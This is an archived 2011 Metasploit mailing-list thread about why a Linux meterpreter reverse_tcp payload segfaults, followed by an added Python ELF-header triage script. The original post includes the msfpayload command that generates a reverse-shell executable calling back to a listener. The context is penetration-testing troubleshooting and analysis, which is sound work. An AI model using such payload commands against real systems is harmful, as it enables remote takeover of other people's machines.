Metasploit mailing list archives

Re: Is Linux meterpreter broken?


From: Crypto Cracker <cryptocracker () gmail com>
Date: Wed, 15 Jun 2011 12:25:37 -0400

Yep this worked. Thanks to every1! :D

It just seemed odd that it wouldn't die nicely after connection failure like
the windoze meterpreter's.

Cheers,

On Thu, Jun 9, 2011 at 2:52 PM, <egypt () metasploit com> wrote:

Yup, Rob has it right here.  If session initiation fails (e.g. because
the handler isn't set up or there is a network issue preventing it
from getting the second stage), the payload will run off the end of
the .text section, causing a segfault.  The "corrupted header size" is
an artifact of how we build the ELF and can be safely ignored.  At
some point we'll probably revamp it a bit so it looks a little more
like a regular ELF.

Hope this helped,
egypt

On Thu, Jun 9, 2011 at 8:07 AM, Rob Fuller <mubix () room362 com> wrote:
Someone will correct me if I'm wrong, but I believe all linux based
payloads will segfault if they cannot create a connection to the
handler, so set up a multi/handler and see if it still segfaults.

--
Rob Fuller | Mubix
Certified Checkbox Unchecker
Room362.com | Hak5.org



On Thu, Jun 9, 2011 at 7:23 AM, Crypto Cracker <cryptocracker () gmail com>
wrote:
Backtrack 5 (x86, KDE) on VirtualBox 4.0.8 r71778:
root@bt:/pentest/exploits/framework3# apt-get update
Hit http://32.repository.backtrack-linux.org revolution Release.gpg
[SNIP]
Reading package lists... Done
root@bt:/pentest/exploits/framework3# apt-get upgrade
Reading package lists... Done
[SNIP]
0 upgraded, 0 newly installed, 0 to remove and 4 not upgraded.
root@bt:/pentest/exploits/framework3# uname -a
Linux bt 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux
root@bt:/pentest/exploits/framework3# svn up
At revision 12886.

[so everything up to date]

root@bt:/pentest/exploits/framework3# ./msfpayload
linux/x86/meterpreter/reverse_tcp LHOST=192.168.137.66 LPORT=80 X >
linux.meterpreter
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/meterpreter/reverse_tcp
 Length: 50
Options: {"LHOST"=>"192.168.137.66", "LPORT"=>"80"}
root@bt:/pentest/exploits/framework3# file linux.meterpreter
linux.meterpreter: ELF 32-bit LSB executable, Intel 80386, version 1
(SYSV),
statically linked, corrupted section header size
root@bt:/pentest/exploits/framework3#
[doh! corrupted section header size!! and of course:]
root@bt:/pentest/exploits/framework3# chmod +x linux.meterpreter
root@bt:/pentest/exploits/framework3# ./linux.meterpreter
Segmentation fault
root@bt:/pentest/exploits/framework3#

or am I doing something wrong?

Thanks a lot,

Crypto.



_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
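To make egypt's two points concrete for anyone triaging one of these stubs, here is an added Python example. It is not code from this thread or from Metasploit: it parses an ELF32 file header and program headers, reports what `file`'s "corrupted section header size" keys on (as far as I recall of libmagic's readelf.c, a comparison of e_shentsize against sizeof(Elf32_Shdr), made regardless of e_shnum), and computes how many file-backed bytes exist after the entry point, which is the stretch a stager runs off the end of when no second stage ever arrives. The sample ELF it builds is constructed for the example: a 52-byte header, one PT_LOAD segment covering the whole file, zeroed section-header fields (my assumption about a minimal hand-built ELF, not a copy of Metasploit's template) and 50 placeholder zero bytes where stager code would sit.

```python
import struct

# ELF32 header: e_ident[16], e_type, e_machine, e_version, e_entry, e_phoff,
# e_shoff, e_flags, e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
ELF32_EHDR = "<16sHHIIIIIHHHHHH"
ELF32_EHDR_SIZE = struct.calcsize(ELF32_EHDR)      # 52
ELF32_PHDR = "<IIIIIIII"                           # Elf32_Phdr
ELF32_PHDR_SIZE = struct.calcsize(ELF32_PHDR)      # 32
ELF32_SHDR_SIZE = 40                               # sizeof(Elf32_Shdr)
PT_LOAD = 1

EHDR_FIELDS = ("e_ident", "e_type", "e_machine", "e_version", "e_entry",
               "e_phoff", "e_shoff", "e_flags", "e_ehsize", "e_phentsize",
               "e_phnum", "e_shentsize", "e_shnum", "e_shstrndx")
PHDR_FIELDS = ("p_type", "p_offset", "p_vaddr", "p_paddr", "p_filesz",
               "p_memsz", "p_flags", "p_align")


def parse_elf32_header(data):
    """Unpack the ELF32 file header into a dict; reject non-ELF32 input."""
    if len(data) < ELF32_EHDR_SIZE:
        raise ValueError("too short for an ELF32 header")
    hdr = dict(zip(EHDR_FIELDS, struct.unpack_from(ELF32_EHDR, data, 0)))
    ident = hdr["e_ident"]
    if ident[:4] != b"\x7fELF":
        raise ValueError("missing ELF magic")
    if ident[4] != 1:                       # EI_CLASS: 1 = ELFCLASS32
        raise ValueError("not an ELFCLASS32 file")
    return hdr


def parse_program_headers(hdr, data):
    """Unpack every Elf32_Phdr referenced by the file header."""
    if hdr["e_phentsize"] != ELF32_PHDR_SIZE:
        raise ValueError("unexpected e_phentsize %d" % hdr["e_phentsize"])
    segs = []
    for i in range(hdr["e_phnum"]):
        off = hdr["e_phoff"] + i * ELF32_PHDR_SIZE
        if off + ELF32_PHDR_SIZE > len(data):
            raise ValueError("program header table runs past EOF")
        segs.append(dict(zip(PHDR_FIELDS, struct.unpack_from(ELF32_PHDR, data, off))))
    return segs


def triage(data):
    """Summarise section-header oddities and what backs the entry point.

    Returns findings (strings) plus: whether e_entry lies inside a PT_LOAD
    segment, and how many file-backed bytes follow it in that segment.
    """
    hdr = parse_elf32_header(data)
    segs = parse_program_headers(hdr, data)
    findings = []

    # libmagic (readelf.c, doshn) compares e_shentsize with sizeof(Elf32_Shdr)
    # and prints ", corrupted section header size" on mismatch.
    if hdr["e_shentsize"] != ELF32_SHDR_SIZE:
        findings.append("e_shentsize=%d (expected %d): libmagic reports "
                        "'corrupted section header size'"
                        % (hdr["e_shentsize"], ELF32_SHDR_SIZE))
    if hdr["e_shnum"] == 0:
        findings.append("no section header table: the loader does not need "
                        "one, but toolchain-built binaries always carry it")
    sh_end = hdr["e_shoff"] + hdr["e_shnum"] * hdr["e_shentsize"]
    if hdr["e_shnum"] and sh_end > len(data):
        findings.append("section header table runs past EOF (%d > %d)"
                        % (sh_end, len(data)))

    entry_in_load = False
    code_bytes_after_entry = 0
    for s in segs:
        if s["p_type"] != PT_LOAD:
            continue
        # Only file-backed bytes count; p_memsz beyond p_filesz is zero-filled.
        if s["p_vaddr"] <= hdr["e_entry"] < s["p_vaddr"] + s["p_filesz"]:
            entry_in_load = True
            code_bytes_after_entry = s["p_vaddr"] + s["p_filesz"] - hdr["e_entry"]
    if not entry_in_load:
        findings.append("e_entry 0x%x is not backed by any PT_LOAD segment"
                        % hdr["e_entry"])

    return {"findings": findings, "entry_in_load": entry_in_load,
            "code_bytes_after_entry": code_bytes_after_entry,
            "load_segments": sum(1 for s in segs if s["p_type"] == PT_LOAD)}


def build_sample_stub(code_len=50, shentsize=0):
    """Constructed sample, not a real payload: ELF32 header + one RWX PT_LOAD
    covering the whole file + code_len zero bytes standing in for stager code.
    e_shoff/e_shnum are zero (assumed minimal hand-built layout); shentsize is
    a parameter so the libmagic check can be shown both ways."""
    base = 0x08048000
    hdr_len = ELF32_EHDR_SIZE + ELF32_PHDR_SIZE        # 84
    total = hdr_len + code_len
    e_ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + bytes(8)   # ELFCLASS32, LSB, v1, SysV
    ehdr = struct.pack(ELF32_EHDR, e_ident,
                       2, 3, 1,                        # ET_EXEC, EM_386, EV_CURRENT
                       base + hdr_len,                 # e_entry: first byte after headers
                       ELF32_EHDR_SIZE, 0, 0,          # e_phoff, e_shoff, e_flags
                       ELF32_EHDR_SIZE, ELF32_PHDR_SIZE, 1,   # e_ehsize, e_phentsize, e_phnum
                       shentsize, 0, 0)                # e_shentsize, e_shnum, e_shstrndx
    phdr = struct.pack(ELF32_PHDR, PT_LOAD, 0, base, base, total, total,
                       7, 0x1000)                      # PF_R|PF_W|PF_X, 4 KiB alignment
    return ehdr + phdr + bytes(code_len)


if __name__ == "__main__":
    for line in triage(build_sample_stub())["findings"]:
        print("-", line)
```

Running it on the constructed sample reports the libmagic mismatch and the missing section table, and shows 50 file-backed bytes after the entry point; past those the mapping is zero padding up to the page boundary and then nothing, which is the "run off the end of .text" segfault egypt describes. For a real file, call `triage(open(path, "rb").read())`; a toolchain-built ELF32 binary should produce no findings, so either finding is a quick tell that you are looking at a hand-assembled stub rather than a linked program.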